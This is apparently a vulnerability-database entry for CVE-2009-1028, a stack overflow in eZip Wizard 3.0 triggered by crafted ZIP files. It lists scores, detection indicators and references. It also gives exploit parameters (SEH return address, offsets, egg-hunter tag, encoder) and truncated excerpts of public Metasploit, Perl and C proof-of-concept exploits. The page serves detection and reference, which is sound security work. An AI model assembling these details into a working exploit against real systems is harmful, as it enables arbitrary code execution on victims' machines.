CVE-2009-1028
Published 2009-03-20
CVE-2009-1028: Stack-based buffer overflow in ediSys eZip Wizard 3.0 allows remote attackers to execute arbitrary code via a crafted .zip file.
Priority P3 54 · critical · 9.3 (CVSS 2.0) · AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 33.01% (98.1st percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| edisys | ezip_wizard | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x61\x61\x7a\x04
- bytes: \x61\x61\x7a\x04 (nseh) + \x10\x07\x02\x10 (seh)
- bytes: \x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34
- bytes: w00tw00t (egg tag)
- bytes: w00tw00t
- Exploit triggers when a victim double-clicks a file inside the crafted ZIP archive opened with eZip Wizard 3.0; monitor for eZip Wizard spawning unexpected child processes.
- Crafted ZIP local file header contains the magic bytes 50 4B 03 04 followed by timestamp bytes B7 AC CE 34; detect anomalous ZIP files with this specific timestamp pattern.
- SEH chain overwrite: look for the 0x58585858 / 0x41414141 pattern in the SEH chain of the eZip Wizard process, as shown in the PoC.
- The Metasploit module uses the AlphanumMixed encoder (x86/alpha_mixed) with BufferRegister=ESP; detect alphanumeric shellcode in ZIP filename fields.
- Egg-hunter tag 'w00t' (w00tw00t marker) present in the ZIP filename or file data field indicates an exploitation attempt.
- The crafted ZIP filename field is padded to ~2500 bytes (\xc4\x09 = 2500 in the filename length field); ZIP files with abnormally large filename lengths targeting eZip Wizard should be flagged.
- The exploit filename inside the ZIP is crafted as 'Admin passwords.txt' padded to 50 bytes before the SEH overwrite; monitor for ZIP entries with this filename pattern.
- The SEH return address 0x10020710 is labeled 'Windows Universal' but was tested specifically on XP SP3 EN (VirtualBox); reliability on other Windows versions is not guaranteed.
- The junk offset of 50 bytes to reach SEH may require adjustment depending on the USERNAME length supplied; a USERNAME of 9 or more characters changes the padding calculation.
- The Metasploit module adjusts padding based on USERNAME length: if USERNAME length >= 9, padding = Offset - 8; otherwise padding = Offset - USERNAME.length.
- Badchars that do not apply to the final payload but must be avoided in the egghunter/SEH overwrite region include null bytes and path separator characters.
No detection rules found.
Exploit-DB · 2011-04-25 · CVE-2009-1028
eZip Wizard 3.0 - Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: ezip_wizard_bof.rb 12428 2011-04-25 01:06:34Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/zip'
class Metasploit3 'eZip Wizard 3.0 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version 3.0 of ediSys Corp.'s eZip Wizard.
In order for the command to be executed, an attacker must convince someone to
open a specially crafted zip file with eZip Wizard, and access the specially
file via double-clickin
Exploit-DB · 2010-04-04 · CVE-2009-1028
eZip Wizard 3.0 - '.zip' File (SEH)
---
#!/usr/bin/perl
# Software : eZip Wizard 3.0 (.zip)
# Author : Lincoln & corelanc0d3r
# Discovered by : fl0 fl0w
# Reference : http://www.exploit-db.com/exploits/8180
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team & fl0 fl0w
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
#Double click on file name inside wizard to trigger exploit
#
#
# Code :
print "|-------------------------------------------
Exploit-DB · 2009-03-09 · CVE-2009-1059
eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)
---
/*ezip wizard Local Stack Buffer Overflow (SEH) POC
SEH chain of main thread
Address SE handler
0012FC60 58585858
0012FC60 41414141 AAAA Pointer to next SEH record
Old bug, still not fixed by vendors; this kind of file can cause problems for a lot of software of this kind.
Ex: ZipGenius stack buffer overflow (SEH overwrite)
zip it fast format string buffer overflow
Power zip 7.2 stack buffer overflow
and so on...
*/
#include
#include
#include
char file[] =
{
0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB7, 0xAC, 0xCE, 0x34, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x08, 0x00, 0x00, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
Metasploit
eZip Wizard 3.0 Stack Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with eZip Wizard, and access the specially crafted file via double-clicking it. By doing so, an attacker can execute arbitrary code as the victim user.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/39169
- http://securityreason.com/securityalert/8217
- http://www.securityfocus.com/bid/34044
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49148
- https://www.exploit-db.com/exploits/8180